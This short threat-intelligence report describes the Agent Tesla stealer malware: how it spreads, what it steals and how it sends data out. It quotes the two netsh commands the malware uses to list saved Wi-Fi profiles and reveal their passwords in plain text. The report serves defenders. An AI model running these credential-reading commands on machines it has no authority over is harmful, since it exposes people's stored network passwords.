Updated versions of Agent Tesla have recently been spotted in the wild that are now capable of stealing Wi-Fi passwords. By issuing the command “netsh wlan show profile,” the malware can retrieve a list of saved SSIDs (Wi-Fi network names). From there, it can issue a second command “netsh wlan show profile name=NETWORK_NAME key=clear” to retrieve the password in plain text.
Agent Tesla is a stealer that has been available since 2014. It is generally spread through phishing with various malicious attachment types such as .zip or .img files and Microsoft Office documents. It can be used to gather system information, steal clipboard data, keylogging and more. Data exfiltration typically happens via email using Simple Mail Transfer Protocol (SMTP) on port 587 through a hardcoded host within the binary.